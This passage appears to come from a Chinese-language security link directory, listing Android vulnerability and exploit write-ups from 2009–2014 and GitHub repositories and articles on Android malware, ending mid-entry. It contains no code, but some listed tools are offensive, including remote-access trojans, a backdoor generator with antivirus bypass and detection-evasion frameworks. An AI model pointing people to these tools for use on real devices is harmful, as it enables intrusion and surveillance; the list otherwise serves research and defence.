[retme] [Android平台上的物理内存暴露漏洞](http://retme.net/index.php/2014/04/01/android-iomem.html) - 2014.04 [freebuf] [Android系统升级提权漏洞](http://www.freebuf.com/news/30684.html) - 2014.03 [retme] [CVE-2012-4220 exploit for Android](http://retme.net/index.php/2014/03/31/CVE-2012-4220-diag.html) - 2014.03 [securityresear] [Firefox for Android Vulnerabilities: Overtaking Firefox Profiles](http://securityresear.ch/2014/03/27/firefox-for-android-vulnerabilities/) - 2014.03 [securityintelligence] [New Vulnerabilities in Firefox for Android: Overtaking Firefox Profiles](https://securityintelligence.com/vulnerabilities-firefox-android-overtaking-firefox-profiles/) - 2014.02 [cyberarms] [Android Webview Exploit Tutorial (70% of Devices Vulnerable!)](https://cyberarms.wordpress.com/2014/02/26/android-webview-exploit-tutorial-70-of-devices-vulnerable/) - 2014.02 [tencent] [窃听风暴: Android平台https嗅探劫持漏洞](https://security.tencent.com/index.php/blog/msg/41) - 2014.02 [k3170makan] [Path Traversal Vulnerability in OI File Manager for Android](http://blog.k3170makan.com/2014/02/path-disclosure-vulnerability-in-io.html) - 2014.02 [freebuf] [窃听风暴:Android平台https嗅探劫持漏洞](http://www.freebuf.com/articles/terminal/26840.html) - 2014.02 [freebuf] [利用旧版Android漏洞的E-Z-2-Use攻击代码已在Metasploit发布](http://www.freebuf.com/news/26731.html) - 2014.02 [k3170makan] [Path Traversal Vulnerability in 'com.smartwho.SmartFileManager' 3.1.2 for Android](http://blog.k3170makan.com/2014/02/path-traversal-vulnerability-in.html) - 2014.02 [k3170makan] [Critical Information Leakage Vulnerabilities in 'Next Browser' 1.16 for Android](http://blog.k3170makan.com/2014/02/critical-information-leakage.html) - 2014.02 [k3170makan] [Path Traversal Vulnerability in File Explorer (FX) for Android](http://blog.k3170makan.com/2014/02/path-traversal-vulnerability-in-file.html) - 2014.02 [malwarebytes] [Vulnerability Discovered in Android’s VPN Connection](https://blog.malwarebytes.com/cybercrime/2014/02/vulnerability-discovered-in-androids-vpn-connection/) - 2014.01 [] [Pileup漏洞:升级安卓系统所面临的安全风险](http://blogs.360.cn/post/pileup-exploit.html) - 2014.01 [trustlook] [Gilt Android App Remote Code Execution Vulnerability](https://blog.trustlook.com/2014/01/26/gilt-remote-code-execution-vulnerability/) - 2014.01 [] [HeartBleed漏洞对安卓客户端的影响](http://blogs.360.cn/post/heartbleed-on-android.html) - 2014.01 [trustlook] [A billion of Android users are exposed to a high risk vulnerability](https://blog.trustlook.com/2014/01/09/2-years-old-android-vulnerability-still-affecting-billion-users/) - 2014.01 [] [OpenSSL六漏洞再公开,安卓客户端受影响](http://blogs.360.cn/post/openssl-bugs-06-05.html) - 2014.01 [] [安卓平台电话拨打权限绕过漏洞(CVE-2013-6272)分析](http://blogs.360.cn/post/cve-2013-6272.html) - 2014.01 [pediy] [[翻译]Android框架层漏洞-Fragment注入](https://bbs.pediy.com/thread-183459.htm) - 2014.01 [] [安卓KeyStore栈溢出漏洞分析(CVE-2014-3100)](http://blogs.360.cn/post/cve-2014-3100.html) - 2014.01 [flanker017] [[Revert from backup]对Android最新fakesms漏洞的分析](https://blog.flanker017.me/android-fakesms-vuln/) - 2013.12 [u011069813] [A New Vulnerability in the Android Framework: Fragment Injection](https://blog.csdn.net/u011069813/article/details/17285481) - 2013.12 [pxb1988] [Android Fragment注入漏洞](https://blog.csdn.net/pxb1988/article/details/17281659) - 2013.12 [securityintelligence] [A New Vulnerability in the Android Framework: Fragment Injection](https://securityintelligence.com/new-vulnerability-android-framework-fragment-injection/) - 2013.12 [checkpoint] [The 2013 Android Vulnerability of the Year | Check Point Software Blog](https://blog.checkpoint.com/2013/12/10/the-2013-android-vulnerability-of-the-year/) - 2013.12 [L173864930] [Android Superuser 提权漏洞分析](https://blog.csdn.net/L173864930/article/details/17194829) - 2013.12 [] [大众型的安卓客户端远程命令执行漏洞](http://0day5.com/archives/928/) - 2013.12 [pediy] [[翻译]Android Master Key漏洞利用与修复](https://bbs.pediy.com/thread-182195.htm) - 2013.12 [pediy] [[翻译]Android Master Key漏洞利用与修复](https://bbs.pediy.com/thread-182187.htm) - 2013.12 [securiteam] [Access vulnerability on Android tablet](https://blogs.securiteam.com/index.php/archives/2298) - 2013.11 [] [Android Superuser 提权漏洞分析](http://www.91ri.org/7811.html) - 2013.11 [freebuf] [MST for Android – 国产WEB漏洞测试平台手机版](http://www.freebuf.com/sectool/18108.html) - 2013.11 [tencent] [Android Superuser 提权漏洞分析](https://security.tencent.com/index.php/blog/msg/29) - 2013.11 [nsfocus] [Android APK文件名长度数字签名绕过漏洞](http://www.nsfocus.net/index.php?act=advisory&do=view&adv_id=56) - 2013.11 [tencent] [庖丁解牛--Android 第三个Master Key漏洞揭秘](https://security.tencent.com/index.php/blog/msg/26) - 2013.11 [freebuf] [黑客可远程控制你的手机 – Android 4.4惊爆漏洞(含EXP)](http://www.freebuf.com/articles/wireless/16423.html) - 2013.11 [trustlook] [Emergency: Android In-app Billing Verification Bypass Vulnerability](https://blog.trustlook.com/2013/11/04/emergency-android-app-billing-verification-bypass-vulnerability/) - 2013.10 [trustlook] [eBay for Android Content Provider Information Disclosure Vulnerability](https://blog.trustlook.com/2013/10/23/ebay-android-content-provider-information-disclosure-vulnerability/) - 2013.09 [leehong2005] [Android WebView的Js对象注入漏洞解决方案](https://blog.csdn.net/leehong2005/article/details/11808557) - 2013.09 [freebuf] [android平台漏洞攻防和代码保护的技术趋势](http://www.freebuf.com/articles/wireless/13505.html) - 2013.09 [pediy] [[下载]《Android平台漏洞攻防和软件保护的技术趋势》幻灯片](https://bbs.pediy.com/thread-179181.htm) - 2013.09 [pediy] [[原创]android webview 漏洞背后的节操](https://bbs.pediy.com/thread-178432.htm) - 2013.09 [trustlook] [Alert: Android WebView addJavascriptInterface Code execution Vulnerability](https://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/) - 2013.08 [talosintelligence] [Bytecode - Covering the Android Vulnerabilities Master Key and Extra Field](https://blog.talosintelligence.com/2013/08/bytecode-covering-android.html) - 2013.08 [kaspersky] [Master Key vulnerabilities in Android: countermeasures and attempts to exploit](https://www.kaspersky.com/blog/master-key-vulnerabilities-in-android-countermeasures-and-attempts-to-exploit/944/) - 2013.08 [kaspersky] [Master keys: Android vulnerabilities allow applications to bypass the system check](https://www.kaspersky.com/blog/master-keys-android-vulnerabilities-allow-applications-to-bypass-the-system-check/14884/) - 2013.08 [su1216] [android安全问题(八)伪造短信(利用原生android4.0漏洞)](https://blog.csdn.net/su1216/article/details/9731627) - 2013.08 [su1216] [android安全问题(八)伪造短信(利用原生android4.0漏洞)](https://blog.csdn.net/su1216/article/details/84465484) - 2013.07 [talosintelligence] [Android Extra Field Vulnerability Spotted in the Wild](https://blog.talosintelligence.com/2013/07/android-extra-field-vulnerability_30.html) - 2013.07 [u011069813] [黑客利用安卓主密钥漏洞在华传播病毒](https://blog.csdn.net/u011069813/article/details/9464319) - 2013.07 [malwarebytes] [New App Fixes Bluebox Android Vulnerability, But Requires Root](https://blog.malwarebytes.com/cybercrime/2013/07/new-app-fixes-bluebox-android-vulnerability-but-requires-root/) - 2013.07 [lhj0711010212] [android提权漏洞CVE-2010-EASY修复](https://blog.csdn.net/lhj0711010212/article/details/9351131) - 2013.07 [freebuf] [中国黑客组织发现第二个Android万能密钥漏洞](http://www.freebuf.com/news/11214.html) - 2013.07 [cyberarms] [Android Patch Fixes Two File Vulnerability Attacks](https://cyberarms.wordpress.com/2013/07/16/android-patch-fixes-two-file-vulnerability-attacks/) - 2013.07 [securityintelligence] [Understanding the Android "master key" vulnerability](https://securityintelligence.com/understanding-the-android-master-key-vulnerability/) - 2013.07 [trendmicro] [Android Vulnerability Affects 99% of Devices – Trend Micro Users Protected](https://blog.trendmicro.com/trendlabs-security-intelligence/trend-micro-solution-for-vulnerability-affecting-nearly-all-android-devices/) - 2013.07 [freebuf] [Android重大漏洞POC](http://www.freebuf.com/news/11027.html) - 2013.07 [pediy] [ANDROID-8219321漏洞、POC及其他相关信息汇总](https://bbs.pediy.com/thread-175175.htm) - 2013.07 [pediy] [[原创]Bluebox Security提报Android 绕过应用签名认证漏洞原理](https://bbs.pediy.com/thread-175129.htm) - 2013.07 [malwarebytes] [UPDATE: New Android Vulnerability Affects 99 percent of Devices](https://blog.malwarebytes.com/cybercrime/2013/07/updatenew-android-vulnerability-affects-99-of-devices/) - 2013.07 [u011069813] [炒的沸沸扬扬的android 大漏洞poc](https://blog.csdn.net/u011069813/article/details/9280213) - 2013.07 [freebuf] [安卓新漏洞将于7月末披露](http://www.freebuf.com/articles/terminal/10984.html) - 2013.07 [freebuf] [安卓新漏洞,9亿安卓设备存风险](http://www.freebuf.com/news/10954.html) - 2013.07 [pediy] [[原创]Bluebox Security最新提报Android漏洞的初步探讨(已确认不是同一个问题,详见正文后的补充说明)](https://bbs.pediy.com/thread-174928.htm) - 2013.07 [malwarebytes] [New Android Vulnerability Affects 99% of Devices](https://blog.malwarebytes.com/cybercrime/2013/07/new-android-vulnerability-affects-99-of-devices/) - 2013.04 [calderonpale] [Taller “Búsqueda de vulnerabilidades en aplicaciones Android”](http://calderonpale.com/taller-busqueda-de-vulnerabilidades-en-aplicaciones-android/) - 2013.04 [calderonpale] [Taller "Búsqueda de vulnerabilidades en aplicaciones Android"](http://calderonpale.com/?p=157) - 2013.02 [calderonpale] [Taller de busqueda de vulnerabilidades en aplicaciones Android en BugCON 2013](http://calderonpale.com/taller-de-busqueda-de-vulnerabilidades-en-aplicaciones-android-en-bugcon-2013/) - 2013.02 [calderonpale] [Taller de busqueda de vulnerabilidades en aplicaciones Android en BugCON 2013](http://calderonpale.com/?p=150) - 2013.01 [freebuf] [Chrome for Android Download函数信息泄漏漏洞(CVE-2012-4906)](http://www.freebuf.com/vuls/6719.html) - 2012.12 [welivesecurity] [New vulnerability on Android Samsung smartphones claimed](https://www.welivesecurity.com/2012/12/19/new-vulnerability-on-android-samsung-smart-phones-claimed/) - 2012.12 [trendmicro] [Exynos-Based Android Devices Suffer From Vulnerability](https://blog.trendmicro.com/trendlabs-security-intelligence/exynos-based-android-devices-suffer-from-vulnerability/) - 2012.11 [freebuf] [对Android最新fakesms漏洞的分析](http://www.freebuf.com/articles/terminal/6169.html) - 2012.11 [pediy] [[分享]关于近期Android系统的任意构造短信漏洞](https://bbs.pediy.com/thread-158309.htm) - 2012.10 [privacy] [Bypassing the Android Permission Model 7: Exploiting Open Interfaces to Steal Permissions](http://privacy-pc.com/articles/bypassing-the-android-permission-model-7-exploiting-open-interfaces-to-steal-permissions.html) - 2012.10 [netspi] [Android Exploitation Technical Paper Release](https://blog.netspi.com/android-exploitation-technical-paper-release/) - 2012.10 [welivesecurity] [Free Android USSD vulnerability protection from ESET now on Google Play](https://www.welivesecurity.com/2012/10/01/free-android-ussd-vulnerability-protection-from-eset-now-on-google-play/) - 2012.09 [welivesecurity] [Android's runaway success leads to fragmentation, vulnerabilities](https://www.welivesecurity.com/2012/09/15/the-dynamic-duo-for-securing-your-android-common-sense-and-security-software/) - 2012.07 [securityresear] [Android DNS Poisoning: Randomness gone bad (CVE-2012-2808)](http://securityresear.ch/2012/07/24/android-dns-poisoning-randomness-gone/) - 2012.07 [crowdstrike] [Upcoming Black Hat USA 2012: Android 4.0.1 Exploitation](https://www.crowdstrike.com/blog/upcoming-black-hat-usa-2012-android-401-exploitation/) - 2012.07 [trendmicro] [Yahoo! Android App Vulnerability May Allow Spamming](https://blog.trendmicro.com/trendlabs-security-intelligence/yahoo-android-app-vulnerability-may-allow-spamming/) - 2012.07 [duo] [Exploit Mitigations in Android Jelly Bean 4.1](https://duo.com/blog/exploit-mitigations-in-android-jelly-bean-4-1) - 2012.05 [securityresear] [Android SQLite Journal Information Disclosure (CVE-2011-3901)](http://securityresear.ch/2012/05/03/android-sqlite-journal-information/) - 2011.09 [trustwave] [Google Android Focus Stealing Vulnerability Demo](https://www.trustwave.com/Resources/SpiderLabs-Blog/Google-Android-Focus-Stealing-Vulnerability-Demo/) - 2011.09 [duo] [Android Vulnerabilities and SOURCE Barcelona](https://duo.com/blog/android-vulnerabilities-and-source-barcelona) - 2011.09 [mcafee] [Rooting Exploit for Android Works Silently](https://securingtomorrow.mcafee.com/mcafee-labs/rooting-exploit-for-android/) - 2011.09 [pediy] [[原创]结合init源码剖析android root提权漏洞(CVE-2010-EASY)](https://bbs.pediy.com/thread-139738.htm) - 2011.09 [pediy] [[原创]Android root源代码剖析--基于CVE - 2010 - EASY](https://bbs.pediy.com/thread-139708.htm) - 2011.08 [trustwave] [TWSL2011-008: Focus Stealing Vulnerability in Android](https://www.trustwave.com/Resources/SpiderLabs-Blog/TWSL2011-008--Focus-Stealing-Vulnerability-in-Android/) - 2011.08 [securityresear] [Android Browser Cross-Application Scripting (CVE-2011-2357)](http://securityresear.ch/2011/08/04/android-browser-cross-application/) - 2011.05 [lookout] [Critical Android Vulnerability: Use Precaution on Public WiFi](https://blog.lookout.com/critical-android-vulnerability-use-precaution-on-public-wifi) - 2010.11 [imthezuk] [Input validation issue exists in WebKit's handling of floating point data types; vulnerability in webkit (work against Android 2.0/2.1 versions)](https://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html) - 2009.08 [c] [CVE-2009-2692 and android; mitigation](https://c-skills.blogspot.com/2009/08/cve-2009-2692-and-android-mitigation.html) *** ## <a id="1e2d63c4b03a69a79a5543b4b0f395a7"></a>恶意代码 ### <a id="9a60c82748643599d1c1a46dc183ab88"></a>工具 - [**537**星][1m] [Java] [trojan-gfw/igniter](https://github.com/trojan-gfw/igniter) A trojan client for Android (UNDER CONSTRUCTION). - [**454**星][7m] [Shell] [ashishb/android-malware](https://github.com/ashishb/android-malware) Collection of android malware samples - [**348**星][6m] [Java] [droidefense/engine](https://github.com/droidefense/engine) Droidefense: Advance Android Malware Analysis Framework - [**193**星][4y] [HTML] [faber03/androidmalwareevaluatingtools](https://github.com/faber03/androidmalwareevaluatingtools) Evaluation tools for malware Android - [**189**星][3y] [Smali] [sslab-gatech/avpass](https://github.com/sslab-gatech/avpass) Tool for leaking and bypassing Android malware detection system - [**138**星][3y] [Java] [mwsrc/betterandrorat](https://github.com/mwsrc/betterandrorat) Android Remote Access Trojan - [**123**星][2y] [Java] [brompwnie/uitkyk](https://github.com/brompwnie/uitkyk) Android Frida库, 用于分析App查找恶意行为 - [**118**星][8y] [C] [secmobi/amatutor](https://github.com/secmobi/amatutor) Android恶意代码分析教程 - [**104**星][4y] [Java] [cvvt/apptroy](https://github.com/cvvt/apptroy) An Online Analysis System for Packed Android Malware - [**100**星][2y] [Lua] [niallmcl/deep-android-malware-detection](https://github.com/niallmcl/deep-android-malware-detection) Code for Deep Android Malware Detection paper - [**87**星][4y] [Py] [necst/aamo](https://github.com/necst/aamo) Another Android Malware Obfuscator - [**85**星][3y] [Py] [idanr1986/cuckoodroid-2.0](https://github.com/idanr1986/cuckoodroid-2.0) 自动化Android 恶意软件分析 - [**83**星][5y] [Py] [maldroid/maldrolyzer](https://github.com/maldroid/maldrolyzer) Simple framework to extract "actionable" data from Android malware (C&Cs, phone numbers etc.) - [**70**星][1y] [dkhuuthe/madlira](https://github.com/dkhuuthe/madlira) Malware detection using learning and information retrieval for Android - [**69**星][1y] [Py] [mwleeds/android-malware-analysis](https://github.com/mwleeds/android-malware-analysis) This project seeks to apply machine learning algorithms to Android malware classification. - [**65**星][4m] [C++] [soarlab/maline](https://github.com/soarlab/maline) Android Malware Detection Framework - [**60**星][2y] [Java] [geeksonsecurity/android-overlay-malware-example](https://github.com/geeksonsecurity/android-overlay-malware-example) Harmless Android malware using the overlay technique to steal user credentials. - [**60**星][8m] [Py] [hgascon/adagio](https://github.com/hgascon/adagio) Structural Analysis and Detection of Android Malware - [**54**星][1m] [Py] [maoqyhz/droidcc](https://github.com/maoqyhz/droidcc) Android malware detection using deep learning, contains android malware samples, papers, tools etc. - [**50**星][3y] [HTML] [mburakergenc/malware-detection-using-machine-learning](https://github.com/mburakergenc/malware-detection-using-machine-learning) Malware detection project on Android devices using machine learning classification algorithms. - [**49**星][2y] [java] [toufikairane/andromalware](https://github.com/tfairane/andromalware) Android Malware for educational purpose - [**45**星][3m] [fkie-cad/destroid](https://github.com/fkie-cad/destroid) Fighting String Encryption in Android Malware - [**42**星][2m] [traceflight/android-malware-datasets](https://github.com/traceflight/android-malware-datasets) Popular Android malware datasets - [**41**星][2y] [Java] [miwong/intellidroid](https://github.com/miwong/intellidroid) A targeted input generator for Android that improves the effectiveness of dynamic malware analysis. - [**33**星][5y] [Shell] [vt-magnum-research/antimalware](https://github.com/vt-magnum-research/antimalware) Dynamic malware analysis for the Android platform - [**30**星][3m] [Java] [cristianturetta/mad-spy](https://github.com/cristianturetta/mad-spy) We developed a malware for educational purposes. In particular, our goal is to provide a PoC of what is known as a Repacking attack, a known technique widely used by malware cybercrooks to trojanize android apps. The answer to solve this particular goal boils down in the simplicity of APK decompiling and smali code injection. - [**27**星][3y] [fouroctets/android-malware-samples](https://github.com/fouroctets/android-malware-samples) Android Malware Samples - [**26**星][1y] [Java] [twilightgod/malwarebuster](https://github.com/twilightgod/malwarebuster) This is a Xposed module. It helps to prevent malwares to register service/receiver which were disabled in My Android Tools before. - [**24**星][3m] [Smali] [aress31/sci](https://github.com/aress31/sci) Framework designed to automate the process of assembly code injection (trojanising) within Android applications. - [**24**星][3y] [Py] [bunseokbot/androtools](https://github.com/bunseokbot/androtools) Android malware static & dynamic analysis and automated action (deprecated) - [**20**星][4y] [C] [exploit-install/thefatrat](https://github.com/exploit-install/thefatrat) An easy tool to generate backdoor with msfvenom (a part from metasploit framework). This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . The malware that created with this tool also have an ability to bypass most AV software protection - [**19**星][2y] [Py] [namk12/malware-detection](https://github.com/namk12/malware-detection) Deep Learning Based Android Malware Detection Framework - [**18**星][3m] [Java] [kapilkchaurasia/behavior-based-malware-detection-system-for-android](https://github.com/kapilkchaurasia/behavior-based-malware-detection-system-for-android) android app for malware detection - [**17**星][3y] [bemre/bankbot-mazain](https://github.com/bemre/bankbot-mazain) 针对Android设备的开源手机银行木马BankBot / Mazain分析 - [**15**星][3y] [Java] [darrylburke/androidmalwareexample](https://github.com/darrylburke/androidmalwareexample) Proof of Concept example of Android Malware used for Research Purposes - [**14**星][9m] [HTML] [fmind/euphony](https://github.com/fmind/euphony) Harmonious Unification of Cacophonous Anti-Virus Vendor Labels for Android Malware - [**13**星][3m] [Py] [vinayakumarr/android-malware-detection](https://github.com/vinayakumarr/android-malware-detection) Android malware detection using static and dynamic analysis - [**11**星][5m] [Py] [jacobsoo/amtracker](https://github.com/jacobsoo/amtracker) Android Malware Tracker - [**11**星][2y] [Py] [tlatkdgus1/android-malware-analysis-system](https://github.com/tlatkdgus1/android-malware-analysis-system) Android Malware Detection based on Deep Learning - [**9**星][2y] [Py] [mldroid/csbd](https://github.com/mldroid/csbd) The repository contains the python implementation of the Android Malware Detection paper: "Empirical assessment of machine learning-based malware detectors for Android: Measuring the Gap between In-the-Lab and In-the-Wild Validation Scenarios" - [**6**星][3y] [Java] [ssesha/malwarescanner](https://github.com/ssesha/malwarescanner) Android app performing hash based malware detection - [**6**星][2y] [Java] [twitter-university/antimalware](https://github.com/twitter-university/antimalware) An Android Eclipse project demonstrating how to build a simple anti-malware application - [**6**星][1y] [Py] [aliemamalinezhad/machine-learning](https://github.com/aliemamalinezhad/machine-learning) android-malware-classification using machine learning algorithms ### <a id="139ddb12762052da5ebe038c455162fa"></a>文章 - 2020.03 [b0n1] [Android – Coronavirus – related malware tracker](https://lukasstefanko.com/2020/03/android-coronavirus-malware.html) - 2020.03 [securelist] [Cookiethief: a cookie-stealing Trojan for Android](https://securelist.com/cookiethief/96332/) - 2020.03 [trendmicro] [Dissecting Geost: Exposing the Anatomy of the Android Trojan Targeting Russian Banks](https://blog.trendmicro.com/trendlabs-security-intelligence/dissecting-geost-exposing-the-anatomy-of-the-android-trojan-targeting-russian-banks/) - 2020.03 [mcafee] [Android/LeifAccess.A is the Silent Fake Reviewer Trojan](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/android-leifaccess-a-is-the-silent-fake-reviewer-trojan/) - 2020.02 [trendmicro] [Malicious Optimizer and Utility Android Apps on Google Play Communicate with Trojans that Install Malware, Perform Mobile Ad Fraud](https://blog.trendmicro.com/trendlabs-security-intelligence/malicious-apps-on-google-play-communicate-with-trojans-install-malware-perform-mobile-ad-fraud/) - 2020.01 [fortinet] [Android Malware Targets Diabetic Patients](https://www.fortinet.com/blog/threat-research/android-malware-targets-diabetic-patients.html) - 2020.01 [buguroo] [Discovery of a spy Trojan that exploits the Android Binder vulnerability](https://www.buguroo.com/en/blog/discovery-of-a-spy-trojan-that-exploits-the-android-binder-vulnerability) - 2019.12 [hakin9] [Quark Engine - An Obfuscation-Neglect Android Malware Scoring System](https://hakin9.org/quark-engine-an-obfuscation-neglect-android-malware-scoring-system/) - 2019.12 [secjuice] [Squeeze Volume 6 - Airline Cyber Attack, Hornet's Nest Malware, Twitter Android App Flaw & More](https://www.secjuice.com/infosec-news-squeeze-vol-6/) - 2019.12 [buguroo] [Banking malware in Android continues to grow. A look at the recent Brazilian banking Trojan BasBanke/Coybot](https://www.buguroo.com/en/blog/banking-malware-in-android-continues-to-grow.-a-look-at-the-recent-brazilian-banking-trojan-basbanke-coybot) - 2019.11 [virusbulletin] [Paper: Dexofuzzy: Android malware similarity clustering method using opcode sequence](https://www.virusbulletin.com/blog/2019/11/paper-dexofuzzy-android-malware-similarity-clustering-method-using-opcode-sequence/) - 2019.10 [4hou] [安卓银行木马Gustuff回归,目标再度锁定澳大利亚](https://www.4hou.com/web/21158.html) - 2019.10 [welivesecurity] [Tracking down the developer of Android adware affecting millions of users | WeLiveSecurity](https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/) - 2019.10 [virusbulletin] [VB2019 paper: Geost botnet. The story of the discovery of a new Android banking trojan from an OpSec error](https://www.virusbulletin.com/blog/2019/10/vb2019-paper-geost-botnet-story-discovery-new-android-banking-trojan-opsec-error/) - 2019.10 [sophos] [Icon-hiding Android adware returns to the Play Market](https://news.sophos.com/en-us/2019/10/08/icon-hiding-android-adware-returns-to-the-play-market/) - 2019.10 [freebuf] [反间谍之旅:首款安卓远控木马工具分析](https://www.freebuf.com/articles/terminal/214201.html) - 2019.10 [4hou] [安卓kernel 0 day漏洞正被恶意利用 请及时升级系统](https://www.4hou.com/info/news/20703.html) - 2019.09 [MastersInEthicalHacking] [What is Android Malware Explained [Hindi]](https://www.youtube.com/watch?v=LG8dxuGzDLs) - 2019.09 [fortinet] [FunkyBot: A New Android Malware Family Targeting Japan](https://www.fortinet.com/blog/threat-research/funkybot-malware-targets-japan.html) - 2019.08 [deepsec] [DeepSec2019 Talk: Android Malware Adventures – Analyzing Samples and Breaking into C&C – Kürşat Oğuzhan Akıncı & Mert Can Coşkuner](https://blog.deepsec.net/deepsec2019-talk-android-malware-adventures-analyzing-samples-and-breaking-into-cc-kursat-oguzhan-akinci-mert-can-coskuner/) - 2019.08 [4hou] [安卓恶意软件分析: 剖析 Hydra Dropper](https://www.4hou.com/mobile/19755.html) - 2019.08 [Sophos] [iPhone holes and Android malware - how to stay safe](https://www.youtube.com/watch?v=9yYOs42GBhg) - 2019.08 [mcafee] [MoqHao Related Android Spyware Targeting Japan and Korea Found on Google Play](https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/moqhao-related-android-spyware-targeting-japan-and-korea-found-on-google-play/) - 2019.08 [mcafee] [MoqHao Related Android Spyware Targeting Japan and Korea Found on Google Play](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/moqhao-related-android-spyware-targeting-japan-and-korea-found-on-google-play/) - 2019.07 [pentest] [Android Malware Analysis : Dissecting Hydra Dropper](https://pentest.blog/android-malware-analysis-dissecting-hydra-dropper/) - 2019.07 [zimperium] [Latest Android Malware is Not a Surprise; Zimperium Customers Protected](https://blog.zimperium.com/latest-android-malware-not-surprise-zimperium-customers-protected/) - 2019.07 [buguroo] [Analyzing the risk of banking malware in Android vs. iOS](https://www.buguroo.com/en/blog/analyzing-the-risk-of-banking-malware-in-android-vs-ios) - 2019.07 [binaryedge] [Guest Post: Using BinaryEdge to hunt for Panda Banker C2 servers and Android Malware](https://blog.binaryedge.io/2019/07/08/guest-post-panda-banker/) - 2019.07 [trendmicro] [Anubis Android Malware Returns with Over 17,000 Samples](https://blog.trendmicro.com/trendlabs-security-intelligence/anubis-android-malware-returns-with-over-17000-samples/) - 2019.06 [arxiv] [[1906.09456] Andro-Simnet: Android Malware Family Classification Using Social Network Analysis](https://arxiv.org/abs/1906.09456) - 2019.05 [arxiv] [[1905.09136] DaDiDroid: An Obfuscation Resilient Tool for Detecting Android Malware via Weighted Directed Call Graph Modelling](https://arxiv.org/abs/1905.09136) - 2019.04 [freebuf] [肚脑虫团伙利用新特种安卓木马StealJob的攻击分析](https://www.freebuf.com/articles/terminal/201246.html) - 2019.03 [arxiv] [[1903.10560] Don't Pick the Cherry: An Evaluation Methodology for Android Malware Detection Methods](https://arxiv.org/abs/1903.10560) - 2019.03 [arxiv] [[1903.01618] Detecting and Classifying Android Malware using Static Analysis along with Creator Information](https://arxiv.org/abs/1903.01618) - 2019.02 [sophos] [Automated Android attacks deliver “UFO” cryptominer Trojan](https://news.sophos.com/en-us/2019/02/26/automated-android-attacks-deliver-ufo-cryptominer-trojan/) - 2019.02 [hakin9] [New Android Malware Uses Motion Sensor Data to Avoid Detection by William Chalk](https://hakin9.org/new-android-malware/) - 2019.02 [welivesecurity] [Navigating the murky waters of Android banking malware](https://www.welivesecurity.com/2019/02/15/navigating-murky-waters-android-banking-malware/) - 2019.02 [arxiv] [[1902.04238] Adversarial Samples on Android Malware Detection Systems for IoT Systems](https://arxiv.org/abs/1902.04238) - 2019.01 [arxiv] [[1904.00735] A Comparative Analysis of Android Malware](https://arxiv.org/abs/1904.00735) - 2019.01 [ly0n] [Understanding sklearn DecisionTree(s) through Android malware detection](http://ly0n.me/2019/01/17/understanding-sklearn-decisiontrees-through-android-malware-detection/) - 2019.01 [ly0n] [Understanding sklearn DecisionTree(s) through Android malware detection](https://paumunoz.tech/2019/01/17/understanding-sklearn-decisiontrees-through-android-malware-detection/) - 2019.01 [arxiv] [[1904.00736] Using Deep Neural Network for Android Malware Detection](https://arxiv.org/abs/1904.00736) - 2019.01 [arxiv] [[1901.07315] Android Malware Detection Using Autoencoder](https://arxiv.org/abs/1901.07315) - 2019.01 [lookout] [Lookout researchers disable Android malware designed to evade detection](https://blog.lookout.com/dresscode) - 2019.01 [trendmicro] [Spyware Disguises as Android Applications on Google Play](https://blog.trendmicro.com/trendlabs-security-intelligence/spyware-disguises-as-android-applications-on-google-play/) - 2018.12 [4hou] [多个安卓墙纸APP运行恶意广告](http://www.4hou.com/web/15385.html) - 2018.12 [4hou] [安卓木马绕过PayPal双因子认证从用户账户窃取资金](http://www.4hou.com/web/15155.html) - 2018.12 [gdatasoftware] [Predictions 2019: "The era of simple Android malware is over"](https://www.gdatasoftware.com/blog/2018/12/31380-preview-2019-the-time-of-simple-android-malware-is-passing) - 2018.12 [webroot] [Cyber News Rundown: Android Trojan Steals Credentials](https://www.webroot.com/blog/2018/12/14/cyber-news-rundown-android-trojan-steals-credentials/) - 2018.12 [welivesecurity] [可绕过PayPal 2FA认证的Android木马分析](https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/) - 2018.11 [b0n1] [Video analysis of Android banking Trojan found on Google Play](https://lukasstefanko.com/2018/11/video-analysis-of-android-banking-trojan-found-on-google-play.html) - 2018.11 [arxiv] [[1811.01027] AiDroid: When Heterogeneous Information Network Marries Deep Neural Network for Real-time Android Malware Detection](https://arxiv.org/abs/1811.01027) - 2018.10 [b0n1] [Android banking malware found on Google Play with over 10,000 installs targets Brazil](https://lukasstefanko.com/2018/10/android-banking-malware-found-on-google-play-with-over-10000-installs-targets-brazil.html) - 2018.09 [gdatasoftware] [Android Trojan reads Whatsapp-Messages](https://www.gdatasoftware.com/blog/2018/09/31122-android-trojan-reads-whatsapp-messages) - 2018.09 [arxiv] [[1809.09035] FeatureAnalytics: An approach to derive relevant attributes for analyzing Android Malware](https://arxiv.org/abs/1809.09035) - 2018.08 [hispasec] [Triout, un nuevo Spyware para dispositivos Android](https://unaaldia.hispasec.com/2018/08/triout-un-nuevo-spyware-para.html) - 2018.08 [fortinet] [Android/BondPath: a Mature Spyware](https://www.fortinet.com/blog/threat-research/android-bondpath--a-mature-spyware.html) - 2018.08 [bitdefender] [Triout – Spyware Framework for Android with Extensive Surveillance Capabilities](https://labs.bitdefender.com/2018/08/triout-spyware-framework-for-android-with-extensive-surveillance-capabilities/) - 2018.08 [arxiv] [[1808.04218] Android HIV: A Study of Repackaging Malware for Evading Machine-Learning Detection](https://arxiv.org/abs/1808.04218) - 2018.08 [aliyun] [基于Telegram的安卓恶意软件HeroRAT分析](https://xz.aliyun.com/t/2525) - 2018.08 [arxiv] [[1808.01186] Stimulation and Detection of Android Repackaged Malware with Active Learning](https://arxiv.org/abs/1808.01186) - 2018.07 [gdatasoftware] [Malware figures for Android rise rapidly](https://www.gdatasoftware.com/blog/2018/07/30937-malware-figures-for-android-rise-rapidly) - 2018.07 [sophos] [Red Alert 2.0: Android Trojan targets security-seekers](https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/) - 2018.07 [arxiv] [[1807.08221] A Preliminary Study On the Sustainability of Android Malware Detection](https://arxiv.org/abs/1807.08221) - 2018.07 [freebuf] 